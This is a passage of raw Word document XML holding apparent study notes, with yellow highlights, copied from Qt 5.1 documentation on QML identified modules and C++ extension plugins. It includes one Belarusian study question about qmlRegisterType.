          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the module (relative to the QML import path, where directory separators are replaced with period characters)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the module </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must register its types</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module identifier type namespace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the module </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>may not register types into any other module's namespace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>clients must specify a version</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> when importing the module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, if an identified module is installed into</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$QML2_IMPORT_PATH/ExampleModule</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the module identifier directive must be:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="00FC1DCE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:spacing w:before="180" w:after="375"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module ExampleModule</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If the strict module is installed into</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$QML2_IMPORT_PATH/com/example/CustomUi</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the module identifier directive must be:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module com</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example</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CustomUi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Clients will then be able to import the above module with the following import statement (assuming that the module registers types into version 1.0 of its namespace):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00FC1DCE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> com</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CustomUi</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="00FC1DCE" w:rsidRDefault="002A69FE" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00FC1DCE" w:rsidRDefault="00490E7E" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId317" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00FC1DCE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtqml/qtqml-modules-cppplugins.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00877F4C" w:rsidRDefault="00192E15" w:rsidP="00877F4C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="393" w:name="_Toc483000615"/>
      <w:bookmarkStart w:id="394" w:name="_Toc483003632"/>
      <w:bookmarkStart w:id="395" w:name="_Toc483603968"/>
      <w:bookmarkStart w:id="396" w:name="_Toc483605188"/>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creating C++ Plugins for QML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="393"/>
      <w:bookmarkEnd w:id="394"/>
      <w:bookmarkEnd w:id="395"/>
      <w:bookmarkEnd w:id="396"/>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00877F4C">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="397" w:name="creating-a-plugin"/>
      <w:bookmarkStart w:id="398" w:name="_Toc483000616"/>
      <w:bookmarkStart w:id="399" w:name="_Toc483003633"/>
      <w:bookmarkStart w:id="400" w:name="_Toc483603969"/>
      <w:bookmarkStart w:id="401" w:name="_Toc483605189"/>
      <w:bookmarkEnd w:id="397"/>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creating a Plugin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="398"/>
      <w:bookmarkEnd w:id="399"/>
      <w:bookmarkEnd w:id="400"/>
      <w:bookmarkEnd w:id="401"/>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId318" w:history="1">
        <w:r w:rsidRPr="002A6A00">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML engine</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002A6A00">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A6A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loads C++ plugins</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for QML. Such plugins are usually </w:t>
      </w:r>
      <w:r w:rsidRPr="002A6A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provided in a QML extension module</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and can provide types for use by clients in QML documents which import the module. A </w:t>
      </w:r>
      <w:r w:rsidRPr="00855D31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> requires </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>at least one type registered</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to be considered </w:t>
      </w:r>
      <w:r w:rsidRPr="00855D31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>valid</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRDefault="00490E7E" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId319" w:history="1">
        <w:r w:rsidR="00192E15" w:rsidRPr="00855D31">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlExtensionPlugin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00192E15" w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00192E15" w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is a plugin interface that makes it possible to create QML extensions that can be loaded dynamically into QML applications. These extensions allow custom QML types to be made available to the QML engine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00855D31" w:rsidRPr="00855D31" w:rsidRDefault="00855D31" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00855D31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">У чым розніца між рэгістрыраваннем тыпаў С++ праз функцыю </w:t>
      </w:r>
      <w:r w:rsidRPr="00855D31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">qmlRegisterType </w:t>
      </w:r>
      <w:r w:rsidRPr="00855D31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>і гэтым механізмам?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="a4"/>
